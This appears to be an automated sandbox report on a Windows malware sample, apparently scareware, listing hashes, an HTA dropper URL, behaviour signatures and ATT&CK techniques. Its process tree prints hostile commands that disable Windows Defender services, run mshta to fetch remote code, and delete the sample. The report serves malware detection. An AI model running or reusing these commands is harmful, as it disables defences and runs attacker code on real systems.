Analysis

  • max time kernel
    150s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2023 00:03

General

  • Target

    07ea654ba805f82dda0ba70e9014f425.exe

  • Size

    1.7MB

  • MD5

    07ea654ba805f82dda0ba70e9014f425

  • SHA1

    f55a8b8c68ff0dd9ce65826ec36430279ddb13c7

  • SHA256

    04dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9

  • SHA512

    0fb3d6845d47c5a70f7c77f8ff705361a71b4c5b4b94e9721af8788cbaa7b6d3c9212f803b92392659f2946ebdb9e69440e99e0630198ae3e98c70d97e9d5440

  • SSDEEP

    49152:y8OU0+IDBPLyNP6RqiLMWhc9mvtzTI6W3gvS1pjtU2Z/9YD:y890dLyNCsWMWhnztWCS1pjNgD

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Sets file execution options in registry 2 TTPs 16 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe
    "C:\Users\Admin\AppData\Local\Temp\07ea654ba805f82dda0ba70e9014f425.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:2684
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:2824
    • C:\Windows\SysWOW64\net.exe
      net stop msmpsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop msmpsvc
        3⤵
          PID:1344
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        2⤵
        • Launches sc.exe
        PID:2120
      • C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        2⤵
        • Modifies WinLogon for persistence
        • Sets file execution options in registry
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\SysWOW64\sc.exe
          sc config msmpsvc start= disabled
          3⤵
          • Launches sc.exe
          PID:1684
        • C:\Windows\SysWOW64\net.exe
          net stop msmpsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop msmpsvc
            4⤵
              PID:2840
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:1656
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            3⤵
            • Launches sc.exe
            PID:1320
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://pcprotectionutility.com/favicon.ico?0=72&1=0&2=1&3=57&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000"
            3⤵
            • Modifies Internet Explorer settings
            PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\07EA65~1.EXE" >> NUL
          2⤵
          • Deletes itself
          PID:772

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Privilege Escalation

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Defense Evasion

      Modify Registry

      3
      T1112

      Impair Defenses

      1
      T1562

      Impact

      Service Stop

      1
      T1489

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        Filesize

        832KB

        MD5

        59f4725cddacdd598306f16bb6146deb

        SHA1

        fbfcc277630ac1a47141523f4fbf35bb05025ab3

        SHA256

        3c4d3250f05eb2bf38737116d51f44e9982115db800c50c04d9f1b5bb6f05529

        SHA512

        9b4669d8e8d78753b9dd42d340deea62de2a4f84cfa9e026561848d1fa294bbb15284ed504f5279025a42d3637e77310d4d8a901edd86bc8aa8eaba658455535

      • C:\Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        Filesize

        768KB

        MD5

        b1b74f7f95f9eb861091ae2da1d47a54

        SHA1

        a517a8b5c733f9b7f1f8ee9d0e1a25730cac975f

        SHA256

        7f4da5fe59093ac6aeed4d8478f11c64956b1e19ddb62c0b55a7c2294ed7582b

        SHA512

        c2be21b76a59c94e833558266923b03356d98474600455f62a19b60bf7db320c513d2c4b3c30e71bbc450e01e162394f9d8f3a1a43c78bbed9d451438462afa2

      • \Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        Filesize

        1.7MB

        MD5

        07ea654ba805f82dda0ba70e9014f425

        SHA1

        f55a8b8c68ff0dd9ce65826ec36430279ddb13c7

        SHA256

        04dda7bb206088660114542dc8ca36b2a1b94f3ffc5347289af449f12bcedca9

        SHA512

        0fb3d6845d47c5a70f7c77f8ff705361a71b4c5b4b94e9721af8788cbaa7b6d3c9212f803b92392659f2946ebdb9e69440e99e0630198ae3e98c70d97e9d5440

      • \Users\Admin\AppData\Roaming\Microsoft\qpvyle.exe
        Filesize

        988KB

        MD5

        33b5337eddb280e153a217cb9b595d59

        SHA1

        be11a003d0c972d456174e1dde24036b5eb11a68

        SHA256

        4bafc2f41843d49d4643a678ada7918d31a165f4354462193d29ee94521d4e37

        SHA512

        6792f453d43a256620a76ad93287604c99717839d90be358ccbc64760e857c47fc50ac8f8af37256a3739b36eeb1cc2ec1e4075d581b56fa08e1e8d522003914

      • memory/2528-24-0x0000000003390000-0x0000000003391000-memory.dmp
        Filesize

        4KB

      • memory/2528-13-0x0000000000230000-0x0000000000231000-memory.dmp
        Filesize

        4KB

      • memory/2528-7-0x00000000032F0000-0x00000000032F1000-memory.dmp
        Filesize

        4KB

      • memory/2528-8-0x00000000032E0000-0x00000000032E2000-memory.dmp
        Filesize

        8KB

      • memory/2528-6-0x00000000007A0000-0x00000000007A1000-memory.dmp
        Filesize

        4KB

      • memory/2528-22-0x0000000003370000-0x0000000003371000-memory.dmp
        Filesize

        4KB

      • memory/2528-4-0x0000000000780000-0x0000000000781000-memory.dmp
        Filesize

        4KB

      • memory/2528-3-0x0000000000710000-0x0000000000711000-memory.dmp
        Filesize

        4KB

      • memory/2528-2-0x0000000000720000-0x0000000000721000-memory.dmp
        Filesize

        4KB

      • memory/2528-9-0x00000000033C0000-0x0000000003500000-memory.dmp
        Filesize

        1.2MB

      • memory/2528-10-0x0000000003330000-0x0000000003331000-memory.dmp
        Filesize

        4KB

      • memory/2528-11-0x00000000032D0000-0x00000000032D2000-memory.dmp
        Filesize

        8KB

      • memory/2528-12-0x0000000003340000-0x0000000003341000-memory.dmp
        Filesize

        4KB

      • memory/2528-21-0x0000000002710000-0x0000000002711000-memory.dmp
        Filesize

        4KB

      • memory/2528-14-0x0000000000250000-0x0000000000251000-memory.dmp
        Filesize

        4KB

      • memory/2528-15-0x0000000003300000-0x0000000003301000-memory.dmp
        Filesize

        4KB

      • memory/2528-16-0x00000000007F0000-0x00000000007F1000-memory.dmp
        Filesize

        4KB

      • memory/2528-37-0x0000000003580000-0x0000000003581000-memory.dmp
        Filesize

        4KB

      • memory/2528-36-0x0000000003590000-0x0000000003591000-memory.dmp
        Filesize

        4KB

      • memory/2528-35-0x0000000003560000-0x0000000003561000-memory.dmp
        Filesize

        4KB

      • memory/2528-34-0x0000000003570000-0x0000000003571000-memory.dmp
        Filesize

        4KB

      • memory/2528-33-0x0000000003540000-0x0000000003541000-memory.dmp
        Filesize

        4KB

      • memory/2528-32-0x0000000003550000-0x0000000003551000-memory.dmp
        Filesize

        4KB

      • memory/2528-31-0x0000000003520000-0x0000000003521000-memory.dmp
        Filesize

        4KB

      • memory/2528-30-0x0000000003530000-0x0000000003531000-memory.dmp
        Filesize

        4KB

      • memory/2528-20-0x0000000003350000-0x0000000003351000-memory.dmp
        Filesize

        4KB

      • memory/2528-28-0x0000000003510000-0x0000000003511000-memory.dmp
        Filesize

        4KB

      • memory/2528-27-0x00000000033A0000-0x00000000033A1000-memory.dmp
        Filesize

        4KB

      • memory/2528-26-0x00000000033B0000-0x00000000033B1000-memory.dmp
        Filesize

        4KB

      • memory/2528-25-0x0000000003380000-0x0000000003381000-memory.dmp
        Filesize

        4KB

      • memory/2528-0-0x0000000000400000-0x000000000070C000-memory.dmp
        Filesize

        3.0MB

      • memory/2528-23-0x0000000003360000-0x0000000003361000-memory.dmp
        Filesize

        4KB

      • memory/2528-5-0x0000000000750000-0x0000000000751000-memory.dmp
        Filesize

        4KB

      • memory/2528-1-0x0000000000730000-0x0000000000731000-memory.dmp
        Filesize

        4KB

      • memory/2528-29-0x0000000003500000-0x0000000003501000-memory.dmp
        Filesize

        4KB

      • memory/2528-19-0x00000000025B0000-0x00000000025B1000-memory.dmp
        Filesize

        4KB

      • memory/2528-18-0x0000000002660000-0x0000000002661000-memory.dmp
        Filesize

        4KB

      • memory/2528-17-0x0000000000390000-0x0000000000391000-memory.dmp
        Filesize

        4KB

      • memory/2528-49-0x0000000003660000-0x0000000003661000-memory.dmp
        Filesize

        4KB

      • memory/2528-48-0x0000000003640000-0x0000000003641000-memory.dmp
        Filesize

        4KB

      • memory/2528-47-0x0000000003650000-0x0000000003651000-memory.dmp
        Filesize

        4KB

      • memory/2528-46-0x0000000003620000-0x0000000003621000-memory.dmp
        Filesize

        4KB

      • memory/2528-45-0x0000000003630000-0x0000000003631000-memory.dmp
        Filesize

        4KB

      • memory/2528-44-0x0000000003600000-0x0000000003601000-memory.dmp
        Filesize

        4KB

      • memory/2528-43-0x0000000003610000-0x0000000003611000-memory.dmp
        Filesize

        4KB

      • memory/2528-42-0x00000000035E0000-0x00000000035E1000-memory.dmp
        Filesize

        4KB

      • memory/2528-41-0x00000000035F0000-0x00000000035F1000-memory.dmp
        Filesize

        4KB

      • memory/2528-40-0x00000000035C0000-0x00000000035C1000-memory.dmp
        Filesize

        4KB

      • memory/2528-39-0x00000000035D0000-0x00000000035D1000-memory.dmp
        Filesize

        4KB

      • memory/2528-38-0x00000000035A0000-0x00000000035A1000-memory.dmp
        Filesize

        4KB

      • memory/2528-50-0x00000000003A0000-0x00000000003FA000-memory.dmp
        Filesize

        360KB

      • memory/2528-51-0x00000000035B0000-0x00000000035B1000-memory.dmp
        Filesize

        4KB

      • memory/2528-58-0x0000000003830000-0x0000000003831000-memory.dmp
        Filesize

        4KB

      • memory/2528-57-0x0000000003810000-0x0000000003811000-memory.dmp
        Filesize

        4KB

      • memory/2528-56-0x0000000003820000-0x0000000003821000-memory.dmp
        Filesize

        4KB

      • memory/2528-55-0x00000000037F0000-0x00000000037F1000-memory.dmp
        Filesize

        4KB

      • memory/2528-54-0x0000000003800000-0x0000000003801000-memory.dmp
        Filesize

        4KB

      • memory/2528-53-0x00000000037D0000-0x00000000037D1000-memory.dmp
        Filesize

        4KB

      • memory/2528-52-0x00000000037E0000-0x00000000037E1000-memory.dmp
        Filesize

        4KB

      • memory/2528-59-0x0000000003840000-0x0000000003841000-memory.dmp
        Filesize

        4KB

      • memory/2528-63-0x00000000041D0000-0x00000000044DC000-memory.dmp
        Filesize

        3.0MB

      • memory/2528-71-0x00000000041D0000-0x00000000041D1000-memory.dmp
        Filesize

        4KB

      • memory/2528-66-0x00000000041D0000-0x00000000044DC000-memory.dmp
        Filesize

        3.0MB

      • memory/2528-74-0x0000000000400000-0x000000000070C000-memory.dmp
        Filesize

        3.0MB

      • memory/2616-70-0x0000000000400000-0x000000000070C000-memory.dmp
        Filesize

        3.0MB